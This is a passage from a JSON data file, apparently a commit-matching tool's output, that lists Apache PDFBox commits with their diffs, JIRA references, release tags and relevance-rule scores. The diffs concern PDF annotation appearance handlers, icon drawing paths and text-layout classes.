8 + 4], pathsArray[i * 8 + 5]);", + "+ cs.lineTo(pathsArray[i * 8 + 6], pathsArray[i * 8 + 7]);", + " }", + "+ cs.stroke();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "fc473f26660e41f841b1630e60266d885b1ed220", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527704572, + "hunks": 2, + "message": "PDFBOX-3280: make class package local again, see https://stackoverflow.com/questions/50593597/pdfbox-clone-font git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832561 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", + "index 773ecd0cb..f91b25608 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", + "@@ -38,5 +38,4 @@ import org.apache.pdfbox.pdmodel.common.COSObjectable;", + " */", + "-public class PDFCloneUtility", + "+class PDFCloneUtility", + " {", + "-", + " private final PDDocument destination;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3280": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3280", + "relevance": 2 + } + ] + }, + { + "commit_id": "0870eabaaaf88efa52c8fffed44cd12032b201ef", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528298846, + "hunks": 5, + "message": "PDFBOX-3353: support undocumented /Rotate setting; make width smaller git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833043 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index bf6d65593..071d9ce67 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -25,2 +25,3 @@ import org.apache.pdfbox.cos.COSArray;", + " import org.apache.pdfbox.cos.COSBase;", + "+import org.apache.pdfbox.cos.COSName;", + " import org.apache.pdfbox.cos.COSNumber;", + "@@ -207,3 +208,9 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "-", + "+ // rotation is an undocumented feature, but Adobe uses it. Examples can be found", + "+ // in pdf_commenting_new.pdf file.", + "+ int rotation = annotation.getCOSObject().getInt(COSName.ROTATE, 0);", + "+ cs.transform(Matrix.getRotateInstance(Math.toRadians(rotation), 0, 0));", + "+ float xOffset;", + "+ float yOffset;", + "+ float width = rotation == 90 || rotation == 270 ? getRectangle().getHeight(): getRectangle().getWidth();", + " // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", + "@@ -217,2 +224,22 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " float fontSize = extractFontSize(annotation);", + "+ switch (rotation)", + "+ {", + "+ case 180:", + "+ xOffset = - getRectangle().getUpperRightX() + fontSize / 2 * factor; ", + "+ yOffset = - getRectangle().getLowerLeftY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ break;", + "+ case 90:", + "+ xOffset = getRectangle().getLowerLeftY() + fontSize / 2 * factor;", + "+ yOffset = - getRectangle().getLowerLeftX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ break;", + "+ case 270:", + "+ xOffset = - getRectangle().getUpperRightY() + fontSize / 2 * factor;", + "+ yOffset = getRectangle().getUpperRightX() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ break;", + "+ case 0:", + "+ default:", + "+ xOffset = getRectangle().getLowerLeftX() + fontSize / 2 * factor;", + "+ yOffset = getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor;", + "+ break;", + "+ }", + " cs.setFont(font, fontSize);", + "@@ -225,8 +252,6 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " .text(new PlainText(annotation.getContents()))", + "- .width(getRectangle().getWidth())", + "+ .width(width - fontSize / factor)", + " .wrapLines(true)", + " //TODO some reverse engineering needed to find out padding", + "- //TODO fat cloudy rectangle in CTAN file has \"the\" incomplete", + "- .initialOffset(getRectangle().getLowerLeftX() + fontSize / 2 * factor, ", + "- getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor)", + "+ .initialOffset(xOffset, yOffset)", + " // Adobe ignores the /Q" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "a3d012bc6eef223ba21b26ba57f377b49d599a89", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526743174, + "hunks": 2, + "message": "PDFBOX-3353: support /LE array (line start / ending styles) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831899 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", + "index 30968ce10..b5833f84a 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", + "@@ -22,2 +22,3 @@ import org.apache.pdfbox.cos.COSName;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", + "@@ -56,2 +57,86 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + "+ /**", + "+ * This will set the line ending style for the start point, see the LE_ constants for the possible values.", + "+ *", + "+ * @param style The new style.", + "+ */", + "+ public void setStartPointEndingStyle(String style)", + "+ {", + "+ if (style == null)", + "+ {", + "+ style = LE_NONE;", + "+ }", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "+ COSArray array;", + "+ if (!(base instanceof COSArray) || ((COSArray) base).size() == 0)", + "+ {", + "+ array = new COSArray();", + "+ array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(LE_NONE));", + "+ getCOSObject().setItem(COSName.LE, array);", + "+ }", + "+ else", + "+ {", + "+ array = (COSArray) base;", + "+ array.setName(0, style);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * This will retrieve the line ending style for the start point, possible values shown in the LE_ constants section.", + "+ *", + "+ * @return The ending style for the start point, LE_NONE if missing, never null.", + "+ */", + "+ public String getStartPointEndingStyle()", + "+ {", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "+ if (base instanceof COSArray && ((COSArray) base).size() >= 2)", + "+ {", + "+ return ((COSArray) base).getName(0, LE_NONE);", + "+ }", + "+ return LE_NONE;", + "+ }", + "+", + "+ /**", + "+ * This will set the line ending style for the end point, see the LE_ constants for the possible values.", + "+ *", + "+ * @param style The new style.", + "+ */", + "+ public void setEndPointEndingStyle(String style)", + "+ {", + "+ if (style == null)", + "+ {", + "+ style = LE_NONE;", + "+ }", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "+ COSArray array;", + "+ if (!(base instanceof COSArray) || ((COSArray) base).size() < 2)", + "+ {", + "+ array = new COSArray();", + "+ array.add(COSName.getPDFName(LE_NONE));", + "+ array.add(COSName.getPDFName(style));", + "+ getCOSObject().setItem(COSName.LE, array);", + "+ }", + "+ else", + "+ {", + "+ array = (COSArray) base;", + "+ array.setName(1, style);", + "+ }", + "+ }", + "+", + "+ /**", + "+ * This will retrieve the line ending style for the end point, possible values shown in the LE_ constants section.", + "+ *", + "+ * @return The ending style for the end point, LE_NONE if missing, never null.", + "+ */", + "+ public String getEndPointEndingStyle()", + "+ {", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "+ if (base instanceof COSArray && ((COSArray) base).size() >= 2)", + "+ {", + "+ return ((COSArray) base).getName(1, LE_NONE);", + "+ }", + "+ return LE_NONE;", + "+ }", + "+", + " /**" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "1c324b02db8d2f1f53256965d4c5b4f3cb5bb2cc", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530200372, + "hunks": 4, + "message": "PDFBOX-3353: support /Comment and /Key git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834620 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 2a9eeabf6..5c49ce015 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -62,2 +62,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " SUPPORTED_NAMES.add(PDAnnotationText.NAME_UP_LEFT_ARROW);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_COMMENT);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_KEY);", + " }", + "@@ -83,6 +85,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- //TODO Comment, Key", + "- // BBox values:", + "- // Key 13 18", + "- // Comment 18 18", + " return;", + "@@ -150,2 +148,8 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "+ case PDAnnotationText.NAME_COMMENT:", + "+ drawComment(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_KEY:", + "+ drawKey(annotation, contentStream);", + "+ break;", + " default:", + "@@ -585,2 +589,88 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private void drawComment(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ adjustRectAndBBox(annotation, 18, 18);", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ contentStream.addRect(0.3f, 0.3f, 18-0.6f, 18-0.6f);", + "+ contentStream.stroke();", + "+", + "+ contentStream.setNonStrokingColor(0);", + "+ contentStream.transform(Matrix.getScaleInstance(0.003f, 0.003f));", + "+ contentStream.transform(Matrix.getTranslateInstance(500, -300));", + "+ ", + "+ // shape from Font Awesome by \"printing\" comment.svg into a PDF", + "+ contentStream.moveTo(2549, 5269);", + "+ contentStream.curveTo(1307, 5269, 300, 4451, 300, 3441);", + "+ contentStream.curveTo(300, 3023, 474, 2640, 764, 2331);", + "+ contentStream.curveTo(633, 1985, 361, 1691, 357, 1688);", + "+ contentStream.curveTo(299, 1626, 283, 1537, 316, 1459);", + "+ contentStream.curveTo(350, 1382, 426, 1332, 510, 1332);", + "+ contentStream.curveTo(1051, 1332, 1477, 1558, 1733, 1739);", + "+ contentStream.curveTo(1987, 1659, 2261, 1613, 2549, 1613);", + "+ contentStream.curveTo(3792, 1613, 4799, 2431, 4799, 3441);", + "+ contentStream.curveTo(4799, 4451, 3792, 5269, 2549, 5269);", + "+ contentStream.closePath();", + "+ contentStream.moveTo(2549, 2035);", + "+ contentStream.curveTo(2315, 2035, 2083, 2071, 1860, 2141);", + "+ contentStream.lineTo(1661, 2204);", + "+ contentStream.lineTo(1490, 2083);", + "+ contentStream.curveTo(1364, 1994, 1192, 1895, 984, 1828);", + "+ contentStream.curveTo(1048, 1935, 1111, 2054, 1159, 2182);", + "+ contentStream.lineTo(1252, 2429);", + "+ contentStream.lineTo(1071, 2620);", + "+ contentStream.curveTo(912, 2790, 721, 3070, 721, 3441);", + "+ contentStream.curveTo(721, 4216, 1541, 4847, 2549, 4847);", + "+ contentStream.curveTo(3558, 4847, 4378, 4216, 4378, 3441);", + "+ contentStream.curveTo(4378, 2666, 3558, 2035, 2549, 2035);", + "+ contentStream.fill();", + "+ }", + "+ ", + "+ private void drawKey(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ adjustRectAndBBox(annotation, 13, 18);", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(200);", + "+", + "+ contentStream.transform(Matrix.getScaleInstance(0.003f, 0.003f));", + "+ contentStream.transform(Matrix.getRotateInstance(Math.toRadians(45), 2500, -800));", + "+", + "+ // shape from Font Awesome by \"printing\" key.svg into a PDF", + "+ contentStream.moveTo(4799, 4004);", + "+ contentStream.curveTo(4799, 3149, 4107, 2457, 3253, 2457);", + "+ contentStream.curveTo(3154, 2457, 3058, 2466, 2964, 2484);", + "+ contentStream.lineTo(2753, 2246);", + "+ contentStream.curveTo(2713, 2201, 2656, 2175, 2595, 2175);", + "+ contentStream.lineTo(2268, 2175);", + "+ contentStream.lineTo(2268, 1824);", + "+ contentStream.curveTo(2268, 1707, 2174, 1613, 2057, 1613);", + "+ contentStream.lineTo(1706, 1613);", + "+ contentStream.lineTo(1706, 1261);", + "+ contentStream.curveTo(1706, 1145, 1611, 1050, 1495, 1050);", + "+ contentStream.lineTo(510, 1050);", + "+ contentStream.curveTo(394, 1050, 300, 1145, 300, 1261);", + "+ contentStream.lineTo(300, 1947);", + "+ contentStream.curveTo(300, 2003, 322, 2057, 361, 2097);", + "+ contentStream.lineTo(1783, 3519);", + "+ contentStream.curveTo(1733, 3671, 1706, 3834, 1706, 4004);", + "+ contentStream.curveTo(1706, 4858, 2398, 5550, 3253, 5550);", + "+ contentStream.curveTo(4109, 5550, 4799, 4860, 4799, 4004);", + "+ contentStream.closePath();", + "+ contentStream.moveTo(3253, 4425);", + "+ contentStream.curveTo(3253, 4192, 3441, 4004, 3674, 4004);", + "+ contentStream.curveTo(3907, 4004, 4096, 4192, 4096, 4425);", + "+ contentStream.curveTo(4096, 4658, 3907, 4847, 3674, 4847);", + "+ contentStream.curveTo(3441, 4847, 3253, 4658, 3253, 4425);", + "+ contentStream.fillAndStroke();", + "+ }", + "+ ", + " private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "23dfd579cfcd8f5775fbc0336dea63d5b7619176", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528040184, + "hunks": 3, + "message": "PDFBOX-4212: add text formatter classes to new ..annotation.layout package git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832775 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "new file mode 100644", + "index 000000000..5688ec385", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "@@ -0,0 +1,102 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.text;", + "+", + "+import org.apache.pdfbox.pdmodel.font.PDFont;", + "+", + "+/**", + "+ * Define styling attributes to be used for text formatting.", + "+ * ", + "+ */", + "+class AppearanceStyle", + "+{", + "+ private PDFont font;", + "+ /**", + "+ * The font size to be used for text formatting.", + "+ *", + "+ * Defaulting to 12 to match Acrobats default.", + "+ */", + "+ private float fontSize = 12.0f;", + "+ ", + "+ /**", + "+ * The leading (distance between lines) to be used for text formatting.", + "+ *", + "+ * Defaulting to 1.2*fontSize to match Acrobats default.", + "+ */", + "+ private float leading = 14.4f;", + "+ ", + "+ /**", + "+ * Get the font used for text formatting.", + "+ * ", + "+ * @return the font used for text formatting.", + "+ */", + "+ PDFont getFont()", + "+ {", + "+ return font;", + "+ }", + "+ ", + "+ /**", + "+ * Set the font to be used for text formatting.", + "+ * ", + "+ * @param font the font to be used.", + "+ */", + "+ void setFont(PDFont font)", + "+ {", + "+ this.font = font;", + "+ }", + "+ ", + "+ /**", + "+ * Get the fontSize used for text formatting.", + "+ * ", + "+ * @return the fontSize used for text formatting.", + "+ */", + "+ float getFontSize()", + "+ {", + "+ return fontSize;", + "+ }", + "+ ", + "+ /**", + "+ * Set the font size to be used for formatting.", + "+ * ", + "+ * @param fontSize the font size.", + "+ */", + "+ void setFontSize(float fontSize)", + "+ {", + "+ this.fontSize = fontSize;", + "+ leading = fontSize * 1.2f;", + "+ }", + "+", + "+ /**", + "+ * Get the leading used for text formatting.", + "+ * ", + "+ * @return the leading used for text formatting.", + "+ */", + "+ float getLeading()", + "+ {", + "+ return leading;", + "+ }", + "+ ", + "+ /**", + "+ * Set the leading used for text formatting.", + "+ * ", + "+ * @param leading the leading to be used.", + "+ */", + "+ void setLeading(float leading)", + "+ {", + "+ this.leading = leading;", + "+ }", + "+}", + "\\ No newline at end of file", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "new file mode 100644", + "index 000000000..c61c8824c", + "--- /dev/null", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "@@ -0,0 +1,290 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel.interactive.annotation.text;", + "+", + "+import java.io.IOException;", + "+import java.text.AttributedString;", + "+import java.text.BreakIterator;", + "+import java.text.AttributedCharacterIterator.Attribute;", + "+import java.util.ArrayList;", + "+import java.util.Arrays;", + "+import java.util.List;", + "+", + "+import org.apache.pdfbox.pdmodel.font.PDFont;", + "+", + "+/**", + "+ * A block of text.", + "+ *

    ", + "+ * A block of text can contain multiple paragraphs which will", + "+ * be treated individually within the block placement.", + "+ *

    ", + "+ * ", + "+ */", + "+class PlainText", + "+{", + "+ private static final float FONTSCALE = 1000f;", + "+ ", + "+ private final List paragraphs;", + "+ ", + "+ /**", + "+ * Construct the text block from a single value.", + "+ * ", + "+ * Constructs the text block from a single value splitting", + "+ * into individual {@link Paragraph} when a new line character is ", + "+ * encountered.", + "+ * ", + "+ * @param textValue the text block string.", + "+ */", + "+ PlainText(String textValue)", + "+ {", + "+ List parts = Arrays.asList(textValue.replaceAll(\"\\t\", \" \").split(\"\\\\r\\\\n|\\\\n|\\\\r|\\\\u2028|\\\\u2029\"));", + "+ paragraphs = new ArrayList<>();", + "+ for (String part : parts)", + "+ {", + "+ \t// Acrobat prints a space for an empty paragraph", + "+ \tif (part.length() == 0)", + "+ \t{", + "+ \t\tpart = \" \";", + "+ \t}", + "+ paragraphs.add(new Paragraph(part));", + "+ }", + "+ }", + "+ ", + "+ /**", + "+ * Construct the text block from a list of values.", + "+ * ", + "+ * Constructs the text block from a list of values treating each", + "+ * entry as an individual {@link Paragraph}.", + "+ * ", + "+ * @param listValue the text block string.", + "+ */", + "+ PlainText(List listValue)", + "+ {", + "+ paragraphs = new ArrayList<>();", + "+ for (String part : listValue)", + "+ {", + "+ paragraphs.add(new Paragraph(part));", + "+ }", + "+ }", + "+ ", + "+ /**", + "+ * Get the list of paragraphs.", + "+ * ", + "+ * @return the paragraphs.", + "+ */", + "+ List getParagraphs()", + "+ {", + "+ return paragraphs;", + "+ }", + "+ ", + "+ /**", + "+ * Attribute keys and attribute values used for text handling.", + "+ * ", + "+ * This is similar to {@link java.awt.font.TextAttribute} but", + "+ * handled individually as to avoid a dependency on awt.", + "+ * ", + "+ */", + "+ static class TextAttribute extends Attribute", + "+ {", + "+ /**", + "+ * UID for serializing.", + "+ */", + "+ private static final long serialVersionUID = -3138885145941283005L;", + "+", + "+ /**", + "+ * Attribute width of the text.", + "+ */", + "+ public static final Attribute WIDTH = new TextAttribute(\"width\");", + "+ ", + "+ protected TextAttribute(String name)", + "+ {", + "+ super(name);", + "+ }", + "+ ", + "+", + "+ }", + "+", + "+ /**", + "+ * A block of text to be formatted as a whole.", + "+ *

    ", + "+ * A block of text can contain multiple paragraphs which will", + "+ * be treated individually within the block placement.", + "+ *

    ", + "+ * ", + "+ */", + "+ static class Paragraph", + "+ {", + "+ private final String textContent;", + "+ ", + "+ Paragraph(String text)", + "+ {", + "+ textContent = text;", + "+ }", + "+ ", + "+ /**", + "+ * Get the paragraph text.", + "+ * ", + "+ * @return the text.", + "+ */", + "+ String getText()", + "+ {", + "+ return textContent;", + "+ }", + "+ ", + "+ /**", + "+ * Break the paragraph into individual lines.", + "+ * ", + "+ * @param font the font used for rendering the text.", + "+ * @param fontSize the fontSize used for rendering the text.", + "+ * @param width the width of the box holding the content.", + "+ * @return the individual lines.", + "+ * @throws IOException", + "+ */", + "+ List getLines(PDFont font, float fontSize, float width) throws IOException", + "+ {", + "+ BreakIterator iterator = BreakIterator.getLineInstance();", + "+ iterator.setText(textContent);", + "+ ", + "+ final float scale = fontSize/FONTSCALE;", + "+ ", + "+ int start = iterator.first();", + "+ int end = iterator.next();", + "+ float lineWidth = 0;", + "+ ", + "+ List textLines = new ArrayList<>();", + "+ Line textLine = new Line();", + "+", + "+ while (end != BreakIterator.DONE)", + "+ {", + "+ String word = textContent.substring(start,end);", + "+ float wordWidth = font.getStringWidth(word) * scale;", + "+ ", + "+ lineWidth = lineWidth + wordWidth;", + "+", + "+ // check if the last word would fit without the whitespace ending it", + "+ if (lineWidth >= width && Character.isWhitespace(word.charAt(word.length()-1)))", + "+ {", + "+ float whitespaceWidth = font.getStringWidth(word.substring(word.length()-1)) * scale;", + "+ lineWidth = lineWidth - whitespaceWidth;", + "+ }", + "+ ", + "+ if (lineWidth >= width)", + "+ {", + "+ textLine.setWidth(textLine.calculateWidth(font, fontSize));", + "+ textLines.add(textLine);", + "+ textLine = new Line();", + "+ lineWidth = font.getStringWidth(word) * scale;", + "+ }", + "+ ", + "+ AttributedString as = new AttributedString(word);", + "+ as.addAttribute(TextAttribute.WIDTH, wordWidth);", + "+ Word wordInstance = new Word(word);", + "+ wordInstance.setAttributes(as);", + "+ textLine.addWord(wordInstance);", + "+ start = end;", + "+ end = iterator.next();", + "+ }", + "+ textLine.setWidth(textLine.calculateWidth(font, fontSize));", + "+ textLines.add(textLine);", + "+ return textLines;", + "+ }", + "+ }", + "+", + "+ /**", + "+ * An individual line of text.", + "+ */", + "+ static class Line", + "+ {", + "+ private final List words = new ArrayList<>();", + "+ private float lineWidth;", + "+", + "+ float getWidth()", + "+ {", + "+ return lineWidth;", + "+ }", + "+ ", + "+ void setWidth(float width)", + "+ {", + "+ lineWidth = width;", + "+ }", + "+ ", + "+ float calculateWidth(PDFont font, float fontSize) throws IOException", + "+ {", + "+ final float scale = fontSize/FONTSCALE;", + "+ float calculatedWidth = 0f;", + "+ for (Word word : words)", + "+ {", + "+ calculatedWidth = calculatedWidth + ", + "+ (Float) word.getAttributes().getIterator().getAttribute(TextAttribute.WIDTH);", + "+ String text = word.getText();", + "+ if (words.indexOf(word) == words.size() -1 && Character.isWhitespace(text.charAt(text.length()-1)))", + "+ {", + "+ float whitespaceWidth = font.getStringWidth(text.substring(text.length()-1)) * scale;", + "+ calculatedWidth = calculatedWidth - whitespaceWidth;", + "+ }", + "+ }", + "+ return calculatedWidth;", + "+ }", + "+", + "+ List getWords()", + "+ {", + "+ return words;", + "+ }", + "+ ", + "+ float 